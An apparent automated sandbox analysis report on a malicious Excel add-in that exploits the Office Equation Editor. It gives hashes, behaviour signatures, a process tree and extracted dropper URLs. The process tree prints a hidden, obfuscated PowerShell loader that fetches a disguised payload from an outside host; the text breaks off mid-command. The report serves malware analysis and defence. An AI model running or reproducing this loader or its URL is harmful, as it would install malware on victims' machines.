Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    19-08-2024 01:01

General

  • Target

    7f676793d8d7c9646d434f5ad2d97790a0beb2c8c4adf19b5a7f1c75edd8f983.xlam

  • Size

    730KB

  • MD5

    156a8325da6a12b655e2c56c0ac7f7e5

  • SHA1

    844d20d5d99b3aa8623fe30980047ca7efbccbcb

  • SHA256

    7f676793d8d7c9646d434f5ad2d97790a0beb2c8c4adf19b5a7f1c75edd8f983

  • SHA512

    594699fdb8dad0472ebb32558c4d66a10788809b49e40c1756f9f34628d2dcbbbaa7f4fb4ca5e2b46825adfd1ff75fc004947f03c5d5d1661f6aed75c40cb8b4

  • SSDEEP

    12288:HpU+OVpm7Cja3ZIjgyHOW67lJ1JcLYXqwIDOYV5RnrOdxE38j:JU+bELgyHU1JyYa7R5lKw38j

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

exe.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\7f676793d8d7c9646d434f5ad2d97790a0beb2c8c4adf19b5a7f1c75edd8f983.xlam
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:668
  • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Launches Equation Editor
    • Suspicious use of WriteProcessMemory
    PID:2688
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bellailoveyou.vbs"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2580
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⧶ ㊑ ⨈ ㎄ ䷯Bp⧶ ㊑ ⨈ ㎄ ䷯G0⧶ ㊑ ⨈ ㎄ ䷯YQBn⧶ ㊑ ⨈ ㎄ ䷯GU⧶ ㊑ ⨈ ㎄ ䷯VQBy⧶ ㊑ ⨈ ㎄ ䷯Gw⧶ ㊑ ⨈ ㎄ ䷯I⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯9⧶ ㊑ ⨈ ㎄ ䷯C⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯JwBo⧶ ㊑ ⨈ ㎄ ䷯HQ⧶ ㊑ ⨈ ㎄ ䷯d⧶ ㊑ ⨈ ㎄ ䷯Bw⧶ ㊑ ⨈ ㎄ ䷯HM⧶ ㊑ ⨈ ㎄ ䷯Og⧶ ㊑ ⨈ ㎄ ䷯v⧶ ㊑ ⨈ ㎄ ䷯C8⧶ ㊑ ⨈ ㎄ ䷯aQBh⧶ ㊑ ⨈ ㎄ ䷯Dg⧶ ㊑ ⨈ ㎄ ䷯M⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯z⧶ ㊑ ⨈ ㎄ ䷯DE⧶ ㊑ ⨈ ㎄ ䷯M⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯0⧶ ㊑ ⨈ ㎄ ䷯C4⧶ ㊑ ⨈ ㎄ ䷯dQBz⧶ ㊑ ⨈ ㎄ ䷯C4⧶ ㊑ ⨈ ㎄ ䷯YQBy⧶ ㊑ ⨈ ㎄ ䷯GM⧶ ㊑ ⨈ ㎄ ䷯a⧶ ㊑ ⨈ ㎄ ䷯Bp⧶ ㊑ ⨈ ㎄ ䷯HY⧶ ㊑ ⨈ ㎄ ䷯ZQ⧶ ㊑ ⨈ ㎄ ䷯u⧶ ㊑ ⨈ ㎄ ䷯G8⧶ ㊑ ⨈ ㎄ ䷯cgBn⧶ ㊑ ⨈ ㎄ ䷯C8⧶ ㊑ ⨈ ㎄ ䷯Mg⧶ ㊑ ⨈ ㎄ ䷯3⧶ ㊑ ⨈ ㎄ ䷯C8⧶ ㊑ ⨈ ㎄ ䷯aQB0⧶ ㊑ ⨈ ㎄ ䷯GU⧶ ㊑ ⨈ ㎄ ䷯bQBz⧶ ㊑ ⨈ ㎄ ䷯C8⧶ ㊑ ⨈ ㎄ ䷯dgBi⧶ ㊑ ⨈ ㎄ ䷯HM⧶ ㊑ ⨈ ㎄ ䷯Xw⧶ ㊑ ⨈ ㎄ ䷯y⧶ ㊑ ⨈ ㎄ ䷯D⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯Mg⧶ ㊑ ⨈ ㎄ ䷯0⧶ ㊑ ⨈ ㎄ ䷯D⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯Nw⧶ ㊑ ⨈ ㎄ ䷯y⧶ ㊑ ⨈ ㎄ ䷯DY⧶ ㊑ ⨈ ㎄ ䷯Xw⧶ ㊑ ⨈ ㎄ ䷯y⧶ ㊑ ⨈ ㎄ ䷯D⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯Mg⧶ ㊑ ⨈ ㎄ ䷯0⧶ ㊑ ⨈ ㎄ ䷯D⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯Nw⧶ ㊑ ⨈ ㎄ ䷯y⧶ ㊑ ⨈ ㎄ ䷯DY⧶ ㊑ ⨈ ㎄ ䷯LwB2⧶ ㊑ ⨈ ㎄ ䷯GI⧶ ㊑ ⨈ ㎄ ䷯cw⧶ ㊑ ⨈ ㎄ ䷯u⧶ ㊑ ⨈ ㎄ ䷯Go⧶ ㊑ ⨈ ㎄ ䷯c⧶ ㊑ ⨈ ㎄ ䷯Bn⧶ ㊑ ⨈ ㎄ ䷯Cc⧶ ㊑ ⨈ ㎄ ䷯Ow⧶ ㊑ ⨈ ㎄ ䷯k⧶ ㊑ ⨈ ㎄ ䷯Hc⧶ ㊑ ⨈ ㎄ ䷯ZQBi⧶ ㊑ ⨈ ㎄ ䷯EM⧶ ㊑ ⨈ ㎄ ䷯b⧶ ㊑ ⨈ ㎄ ䷯Bp⧶ ㊑ ⨈ ㎄ ䷯GU⧶ ㊑ ⨈ ㎄ ䷯bgB0⧶ ㊑ ⨈ ㎄ ䷯C⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯PQ⧶ ㊑ ⨈ ㎄ ䷯g⧶ ㊑ ⨈ ㎄ ䷯E4⧶ ㊑ ⨈ ㎄ ䷯ZQB3⧶ ㊑ ⨈ ㎄ ䷯C0⧶ ㊑ ⨈ ㎄ ䷯TwBi⧶ ㊑ ⨈ ㎄ ䷯Go⧶ ㊑ ⨈ ㎄ ䷯ZQBj⧶ ㊑ ⨈ ㎄ ䷯HQ⧶ ㊑ ⨈ ㎄ ䷯I⧶ ㊑ ⨈ ㎄ ䷯BT⧶ ㊑ ⨈ ㎄ ䷯Hk⧶ ㊑ ⨈ ㎄ ䷯cwB0⧶ ㊑ ⨈ ㎄ ䷯GU⧶ ㊑ ⨈ ㎄ ䷯bQ⧶ ㊑ ⨈ ㎄ ䷯u⧶ ㊑ ⨈ ㎄ ䷯E4⧶ ㊑ ⨈ ㎄ ䷯ZQB0⧶ ㊑ ⨈ ㎄ ䷯C4⧶ ㊑ ⨈ ㎄ ䷯VwBl⧶ ㊑ ⨈ ㎄ ䷯GI⧶ ㊑ ⨈ ㎄ ䷯QwBs⧶ ㊑ ⨈ ㎄ ䷯Gk⧶ ㊑ ⨈ ㎄ ䷯ZQBu⧶ ㊑ ⨈ ㎄ ䷯HQ⧶ ㊑ ⨈ ㎄ ䷯Ow⧶ ㊑ ⨈ ㎄ ䷯k⧶ ㊑ ⨈ ㎄ ䷯Gk⧶ ㊑ ⨈ ㎄ ䷯bQBh⧶ ㊑ ⨈ ㎄ ䷯Gc⧶ ㊑ ⨈ ㎄ ䷯ZQBC⧶ ㊑ ⨈ ㎄ ䷯Hk⧶ ㊑ ⨈ ㎄ ䷯d⧶ ㊑ ⨈ ㎄ ䷯Bl⧶ ㊑ ⨈ ㎄ ䷯HM⧶ ㊑ ⨈ ㎄ ䷯I⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯9⧶ ㊑ ⨈ ㎄ ䷯C⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯J⧶ ㊑ ⨈ ㎄ ䷯B3⧶ ㊑ ⨈ ㎄ ䷯GU⧶ ㊑ ⨈ ㎄ ䷯YgBD⧶ ㊑ ⨈ ㎄ ䷯Gw⧶ ㊑ ⨈ ㎄ ䷯aQBl⧶ ㊑ ⨈ ㎄ ䷯G4⧶ ㊑ ⨈ ㎄ ䷯d⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯u⧶ ㊑ ⨈ ㎄ ䷯EQ⧶ ㊑ ⨈ ㎄ ䷯bwB3⧶ ㊑ ⨈ ㎄ ䷯G4⧶ ㊑ ⨈ ㎄ ䷯b⧶ ㊑ ⨈ ㎄ ䷯Bv⧶ ㊑ ⨈ ㎄ ䷯GE⧶ ㊑ ⨈ ㎄ ䷯Z⧶ ㊑ ⨈ ㎄ ䷯BE⧶ ㊑ ⨈ ㎄ ䷯GE⧶ ㊑ ⨈ ㎄ ䷯d⧶ ㊑ ⨈ ㎄ ䷯Bh⧶ ㊑ ⨈ ㎄ ䷯Cg⧶ ㊑ ⨈ ㎄ ䷯J⧶ ㊑ ⨈ ㎄ ䷯Bp⧶ ㊑ ⨈ ㎄ ䷯G0⧶ ㊑ ⨈ ㎄ ䷯YQBn⧶ ㊑ ⨈ ㎄ ䷯GU⧶ ㊑ ⨈ ㎄ ䷯VQBy⧶ ㊑ ⨈ ㎄ ䷯Gw⧶ ㊑ ⨈ ㎄ ䷯KQ⧶ ㊑ ⨈ ㎄ ䷯7⧶ ㊑ ⨈ ㎄ ䷯CQ⧶ ㊑ ⨈ ㎄ ䷯aQBt⧶ ㊑ ⨈ ㎄ ䷯GE⧶ ㊑ ⨈ ㎄ ䷯ZwBl⧶ ㊑ ⨈ ㎄ ䷯FQ⧶ ㊑ ⨈ ㎄ ䷯ZQB4⧶ ㊑ ⨈ ㎄ ䷯HQ⧶ ㊑ ⨈ ㎄ ䷯I⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯9⧶ ㊑ ⨈ ㎄ ䷯C⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯WwBT⧶ ㊑ ⨈ ㎄ ䷯Hk⧶ ㊑ ⨈ ㎄ ䷯cwB0⧶ ㊑ ⨈ ㎄ ䷯GU⧶ ㊑ ⨈ ㎄ ䷯bQ⧶ ㊑ ⨈ ㎄ ䷯u⧶ ㊑ ⨈ ㎄ ䷯FQ⧶ ㊑ ⨈ ㎄ ䷯ZQB4⧶ ㊑ ⨈ ㎄ ䷯HQ⧶ ㊑ ⨈ ㎄ ䷯LgBF⧶ ㊑ ⨈ ㎄ ䷯G4⧶ ㊑ ⨈ ㎄ ䷯YwBv⧶ ㊑ ⨈ ㎄ ䷯GQ⧶ ㊑ ⨈ ㎄ ䷯aQBu⧶ ㊑ ⨈ ㎄ ䷯Gc⧶ ㊑ ⨈ ㎄ ䷯XQ⧶ ㊑ ⨈ ㎄ ䷯6⧶ ㊑ ⨈ ㎄ ䷯Do⧶ ㊑ ⨈ ㎄ ䷯VQBU⧶ ㊑ ⨈ ㎄ ䷯EY⧶ ㊑ ⨈ ㎄ ䷯O⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯u⧶ ㊑ ⨈ ㎄ ䷯Ec⧶ ㊑ ⨈ ㎄ ䷯ZQB0⧶ ㊑ ⨈ ㎄ ䷯FM⧶ ㊑ ⨈ ㎄ ䷯d⧶ ㊑ ⨈ ㎄ ䷯By⧶ ㊑ ⨈ ㎄ ䷯Gk⧶ ㊑ ⨈ ㎄ ䷯bgBn⧶ ㊑ ⨈ ㎄ ䷯Cg⧶ ㊑ ⨈ ㎄ ䷯J⧶ ㊑ ⨈ ㎄ ䷯Bp⧶ ㊑ ⨈ ㎄ ䷯G0⧶ ㊑ ⨈ ㎄ ䷯YQBn⧶ ㊑ ⨈ ㎄ ䷯GU⧶ ㊑ ⨈ ㎄ ䷯QgB5⧶ ㊑ ⨈ ㎄ ䷯HQ⧶ ㊑ ⨈ ㎄ ䷯ZQBz⧶ ㊑ ⨈ ㎄ ䷯Ck⧶ ㊑ ⨈ ㎄ ䷯Ow⧶ ㊑ ⨈ ㎄ ䷯k⧶ ㊑ ⨈ ㎄ ䷯HM⧶ ㊑ ⨈ ㎄ ䷯d⧶ ㊑ ⨈ ㎄ ䷯Bh⧶ ㊑ ⨈ ㎄ ䷯HI⧶ ㊑ ⨈ ㎄ ䷯d⧶ ㊑ ⨈ ㎄ ䷯BG⧶ ㊑ ⨈ ㎄ ䷯Gw⧶ ㊑ ⨈ ㎄ ䷯YQBn⧶ ㊑ ⨈ ㎄ ䷯C⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯PQ⧶ ㊑ ⨈ ㎄ ䷯g⧶ ㊑ ⨈ ㎄ ䷯Cc⧶ ㊑ ⨈ ㎄ ䷯P⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯8⧶ ㊑ ⨈ ㎄ ䷯EI⧶ ㊑ ⨈ ㎄ ䷯QQBT⧶ ㊑ ⨈ ㎄ ䷯EU⧶ ㊑ ⨈ ㎄ ䷯Ng⧶ ㊑ ⨈ ㎄ ䷯0⧶ ㊑ ⨈ ㎄ ䷯F8⧶ ㊑ ⨈ ㎄ ䷯UwBU⧶ ㊑ ⨈ ㎄ ䷯EE⧶ ㊑ ⨈ ㎄ ䷯UgBU⧶ ㊑ ⨈ ㎄ ䷯D4⧶ ㊑ ⨈ ㎄ ䷯Pg⧶ ㊑ ⨈ ㎄ ䷯n⧶ ㊑ ⨈ ㎄ ䷯Ds⧶ ㊑ ⨈ ㎄ ䷯J⧶ ㊑ ⨈ ㎄ ䷯Bl⧶ ㊑ ⨈ ㎄ ䷯G4⧶ ㊑ ⨈ ㎄ ䷯Z⧶ ㊑ ⨈ ㎄ ䷯BG⧶ ㊑ ⨈ ㎄ ䷯Gw⧶ ㊑ ⨈ ㎄ ䷯YQBn⧶ ㊑ ⨈ ㎄ ䷯C⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯PQ⧶ ㊑ ⨈ ㎄ ䷯g⧶ ㊑ ⨈ ㎄ ䷯Cc⧶ ㊑ ⨈ ㎄ ䷯P⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯8⧶ ㊑ ⨈ ㎄ ䷯EI⧶ ㊑ ⨈ ㎄ ䷯QQBT⧶ ㊑ ⨈ ㎄ ䷯EU⧶ ㊑ ⨈ ㎄ ䷯Ng⧶ ㊑ ⨈ ㎄ ䷯0⧶ ㊑ ⨈ ㎄ ䷯F8⧶ ㊑ ⨈ ㎄ ䷯RQBO⧶ ㊑ ⨈ ㎄ ䷯EQ⧶ ㊑ ⨈ ㎄ ䷯Pg⧶ ㊑ ⨈ ㎄ ䷯+⧶ ㊑ ⨈ ㎄ ䷯Cc⧶ ㊑ ⨈ ㎄ ䷯Ow⧶ ㊑ ⨈ ㎄ ䷯k⧶ ㊑ ⨈ ㎄ ䷯HM⧶ ㊑ ⨈ ㎄ ䷯d⧶ ㊑ ⨈ ㎄ ䷯Bh⧶ ㊑ ⨈ ㎄ ䷯HI⧶ ㊑ ⨈ ㎄ ䷯d⧶ ㊑ ⨈ ㎄ ䷯BJ⧶ ㊑ ⨈ ㎄ ䷯G4⧶ ㊑ ⨈ ㎄ ䷯Z⧶ ㊑ ⨈ ㎄ ䷯Bl⧶ ㊑ ⨈ ㎄ ䷯Hg⧶ ㊑ ⨈ ㎄ ䷯I⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯9⧶ ㊑ ⨈ ㎄ ䷯C⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯J⧶ ㊑ ⨈ ㎄ ䷯Bp⧶ ㊑ ⨈ ㎄ ䷯G0⧶ ㊑ ⨈ ㎄ ䷯YQBn⧶ ㊑ ⨈ ㎄ ䷯GU⧶ ㊑ ⨈ ㎄ ䷯V⧶ ㊑ ⨈ ㎄ ䷯Bl⧶ ㊑ ⨈ ㎄ ䷯Hg⧶ ㊑ ⨈ ㎄ ䷯d⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯u⧶ ㊑ ⨈ ㎄ ䷯Ek⧶ ㊑ ⨈ ㎄ ䷯bgBk⧶ ㊑ ⨈ ㎄ ䷯GU⧶ ㊑ ⨈ ㎄ ䷯e⧶ ㊑ ⨈ ㎄ ䷯BP⧶ ㊑ ⨈ ㎄ ䷯GY⧶ ㊑ ⨈ ㎄ ䷯K⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯k⧶ ㊑ ⨈ ㎄ ䷯HM⧶ ㊑ ⨈ ㎄ ䷯d⧶ ㊑ ⨈ ㎄ ䷯Bh⧶ ㊑ ⨈ ㎄ ䷯HI⧶ ㊑ ⨈ ㎄ ䷯d⧶ ㊑ ⨈ ㎄ ䷯BG⧶ ㊑ ⨈ ㎄ ䷯Gw⧶ ㊑ ⨈ ㎄ ䷯YQBn⧶ ㊑ ⨈ ㎄ ䷯Ck⧶ ㊑ ⨈ ㎄ ䷯Ow⧶ ㊑ ⨈ ㎄ ䷯k⧶ ㊑ ⨈ ㎄ ䷯GU⧶ ㊑ ⨈ ㎄ ䷯bgBk⧶ ㊑ ⨈ ㎄ ䷯Ek⧶ ㊑ ⨈ ㎄ ䷯bgBk⧶ ㊑ ⨈ ㎄ ䷯GU⧶ ㊑ ⨈ ㎄ ䷯e⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯g⧶ ㊑ ⨈ ㎄ ䷯D0⧶ ㊑ ⨈ ㎄ ䷯I⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯k⧶ ㊑ ⨈ ㎄ ䷯Gk⧶ ㊑ ⨈ ㎄ ䷯bQBh⧶ ㊑ ⨈ ㎄ ䷯Gc⧶ ㊑ ⨈ ㎄ ䷯ZQBU⧶ ㊑ ⨈ ㎄ ䷯GU⧶ ㊑ ⨈ ㎄ ䷯e⧶ ㊑ ⨈ ㎄ ䷯B0⧶ ㊑ ⨈ ㎄ ䷯C4⧶ ㊑ ⨈ ㎄ ䷯SQBu⧶ ㊑ ⨈ ㎄ ䷯GQ⧶ ㊑ ⨈ ㎄ ䷯ZQB4⧶ ㊑ ⨈ ㎄ ䷯E8⧶ ㊑ ⨈ ㎄ ䷯Zg⧶ ㊑ ⨈ ㎄ ䷯o⧶ ㊑ ⨈ ㎄ ䷯CQ⧶ ㊑ ⨈ ㎄ ䷯ZQBu⧶ ㊑ ⨈ ㎄ ䷯GQ⧶ ㊑ ⨈ ㎄ ䷯RgBs⧶ ㊑ ⨈ ㎄ ䷯GE⧶ ㊑ ⨈ ㎄ ䷯Zw⧶ ㊑ ⨈ ㎄ ䷯p⧶ ㊑ ⨈ ㎄ ䷯Ds⧶ ㊑ ⨈ ㎄ ䷯J⧶ ㊑ ⨈ ㎄ ䷯Bz⧶ ㊑ ⨈ ㎄ ䷯HQ⧶ ㊑ ⨈ ㎄ ䷯YQBy⧶ ㊑ ⨈ ㎄ ䷯HQ⧶ ㊑ ⨈ ㎄ ䷯SQBu⧶ ㊑ ⨈ ㎄ ䷯GQ⧶ ㊑ ⨈ ㎄ ䷯ZQB4⧶ ㊑ ⨈ ㎄ ䷯C⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯LQBn⧶ ㊑ ⨈ ㎄ ䷯GU⧶ ㊑ ⨈ ㎄ ䷯I⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯w⧶ ㊑ ⨈ ㎄ ䷯C⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯LQBh⧶ ㊑ ⨈ ㎄ ䷯G4⧶ ㊑ ⨈ ㎄ ䷯Z⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯g⧶ ㊑ ⨈ ㎄ ䷯CQ⧶ ㊑ ⨈ ㎄ ䷯ZQBu⧶ ㊑ ⨈ ㎄ ䷯GQ⧶ ㊑ ⨈ ㎄ ䷯SQBu⧶ ㊑ ⨈ ㎄ ䷯GQ⧶ ㊑ ⨈ ㎄ ䷯ZQB4⧶ ㊑ ⨈ ㎄ ䷯C⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯LQBn⧶ ㊑ ⨈ ㎄ ䷯HQ⧶ ㊑ ⨈ ㎄ ䷯I⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯k⧶ ㊑ ⨈ ㎄ ䷯HM⧶ ㊑ ⨈ ㎄ ䷯d⧶ ㊑ ⨈ ㎄ ䷯Bh⧶ ㊑ ⨈ ㎄ ䷯HI⧶ ㊑ ⨈ ㎄ ䷯d⧶ ㊑ ⨈ ㎄ ䷯BJ⧶ ㊑ ⨈ ㎄ ䷯G4⧶ ㊑ ⨈ ㎄ ䷯Z⧶ ㊑ ⨈ ㎄ ䷯Bl⧶ ㊑ ⨈ ㎄ ䷯Hg⧶ ㊑ ⨈ ㎄ ䷯Ow⧶ ㊑ ⨈ ㎄ ䷯k⧶ ㊑ ⨈ ㎄ ䷯HM⧶ ㊑ ⨈ ㎄ ䷯d⧶ ㊑ ⨈ ㎄ ䷯Bh⧶ ㊑ ⨈ ㎄ ䷯HI⧶ ㊑ ⨈ ㎄ ䷯d⧶ ㊑ ⨈ ㎄ ䷯BJ⧶ ㊑ ⨈ ㎄ ䷯G4⧶ ㊑ ⨈ ㎄ ䷯Z⧶ ㊑ ⨈ ㎄ ䷯Bl⧶ ㊑ ⨈ ㎄ ䷯Hg⧶ ㊑ ⨈ ㎄ ䷯I⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯r⧶ ㊑ ⨈ ㎄ ䷯D0⧶ ㊑ ⨈ ㎄ ䷯I⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯k⧶ ㊑ ⨈ ㎄ ䷯HM⧶ ㊑ ⨈ ㎄ ䷯d⧶ ㊑ ⨈ ㎄ ䷯Bh⧶ ㊑ ⨈ ㎄ ䷯HI⧶ ㊑ ⨈ ㎄ ䷯d⧶ ㊑ ⨈ ㎄ ䷯BG⧶ ㊑ ⨈ ㎄ ䷯Gw⧶ ㊑ ⨈ ㎄ ䷯YQBn⧶ ㊑ ⨈ ㎄ ䷯C4⧶ ㊑ ⨈ ㎄ ䷯T⧶ ㊑ ⨈ ㎄ ䷯Bl⧶ ㊑ ⨈ ㎄ ䷯G4⧶ ㊑ ⨈ ㎄ ䷯ZwB0⧶ ㊑ ⨈ ㎄ ䷯Gg⧶ ㊑ ⨈ ㎄ ䷯Ow⧶ ㊑ ⨈ ㎄ ䷯k⧶ ㊑ ⨈ ㎄ ䷯GI⧶ ㊑ ⨈ ㎄ ䷯YQBz⧶ ㊑ ⨈ ㎄ ䷯GU⧶ ㊑ ⨈ ㎄ ䷯Ng⧶ ㊑ ⨈ ㎄ ䷯0⧶ ㊑ ⨈ ㎄ ䷯Ew⧶ ㊑ ⨈ ㎄ ䷯ZQBu⧶ ㊑ ⨈ ㎄ ䷯Gc⧶ ㊑ ⨈ ㎄ ䷯d⧶ ㊑ ⨈ ㎄ ䷯Bo⧶ ㊑ ⨈ ㎄ ䷯C⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯PQ⧶ ㊑ ⨈ ㎄ ䷯g⧶ ㊑ ⨈ ㎄ ䷯CQ⧶ ㊑ ⨈ ㎄ ䷯ZQBu⧶ ㊑ ⨈ ㎄ ䷯GQ⧶ ㊑ ⨈ ㎄ ䷯SQBu⧶ ㊑ ⨈ ㎄ ䷯GQ⧶ ㊑ ⨈ ㎄ ䷯ZQB4⧶ ㊑ ⨈ ㎄ ䷯C⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯LQ⧶ ㊑ ⨈ ㎄ ䷯g⧶ ㊑ ⨈ ㎄ ䷯CQ⧶ ㊑ ⨈ ㎄ ䷯cwB0⧶ ㊑ ⨈ ㎄ ䷯GE⧶ ㊑ ⨈ ㎄ ䷯cgB0⧶ ㊑ ⨈ ㎄ ䷯Ek⧶ ㊑ ⨈ ㎄ ䷯bgBk⧶ ㊑ ⨈ ㎄ ䷯GU⧶ ㊑ ⨈ ㎄ ䷯e⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯7⧶ ㊑ ⨈ ㎄ ䷯CQ⧶ ㊑ ⨈ ㎄ ䷯YgBh⧶ ㊑ ⨈ ㎄ ䷯HM⧶ ㊑ ⨈ ㎄ ䷯ZQ⧶ ㊑ ⨈ ㎄ ䷯2⧶ ㊑ ⨈ ㎄ ䷯DQ⧶ ㊑ ⨈ ㎄ ䷯QwBv⧶ ㊑ ⨈ ㎄ ䷯G0⧶ ㊑ ⨈ ㎄ ䷯bQBh⧶ ㊑ ⨈ ㎄ ䷯G4⧶ ㊑ ⨈ ㎄ ䷯Z⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯g⧶ ㊑ ⨈ ㎄ ䷯D0⧶ ㊑ ⨈ ㎄ ䷯I⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯k⧶ ㊑ ⨈ ㎄ ䷯Gk⧶ ㊑ ⨈ ㎄ ䷯bQBh⧶ ㊑ ⨈ ㎄ ䷯Gc⧶ ㊑ ⨈ ㎄ ䷯ZQBU⧶ ㊑ ⨈ ㎄ ䷯GU⧶ ㊑ ⨈ ㎄ ䷯e⧶ ㊑ ⨈ ㎄ ䷯B0⧶ ㊑ ⨈ ㎄ ䷯C4⧶ ㊑ ⨈ ㎄ ䷯UwB1⧶ ㊑ ⨈ ㎄ ䷯GI⧶ ㊑ ⨈ ㎄ ䷯cwB0⧶ ㊑ ⨈ ㎄ ䷯HI⧶ ㊑ ⨈ ㎄ ䷯aQBu⧶ ㊑ ⨈ ㎄ ䷯Gc⧶ ㊑ ⨈ ㎄ ䷯K⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯k⧶ ㊑ ⨈ ㎄ ䷯HM⧶ ㊑ ⨈ ㎄ ䷯d⧶ ㊑ ⨈ ㎄ ䷯Bh⧶ ㊑ ⨈ ㎄ ䷯HI⧶ ㊑ ⨈ ㎄ ䷯d⧶ ㊑ ⨈ ㎄ ䷯BJ⧶ ㊑ ⨈ ㎄ ䷯G4⧶ ㊑ ⨈ ㎄ ䷯Z⧶ ㊑ ⨈ ㎄ ䷯Bl⧶ ㊑ ⨈ ㎄ ䷯Hg⧶ ㊑ ⨈ ㎄ ䷯L⧶ ㊑ ⨈ ㎄ ䷯⧶ ㊑ ⨈ ㎄ ䷯g⧶ ㊑ ⨈ ㎄ ䷯CQ⧶ ㊑ ⨈ ㎄ ䷯YgBh⧶ ㊑ ⨈ ㎄ ䷯HM⧶ ㊑ ⨈ ㎄ ䷯ZQ⧶ ㊑ ⨈ ㎄ ䷯2⧶ ㊑ ⨈ ㎄ ䷯DQ⧶ ㊑ ⨈ ㎄ ䷯T⧶ ㊑ ⨈ ㎄ ䷯Bl⧶ ㊑ ⨈ ㎄ ䷯G4⧶ ㊑ ⨈ ㎄ ䷯ZwB0⧶ ㊑ ⨈ ㎄ ䷯Gg⧶ ㊑ ⨈ ㎄ ䷯KQ⧶ ㊑ ⨈ ㎄ ䷯7⧶ ㊑ ⨈ ㎄ 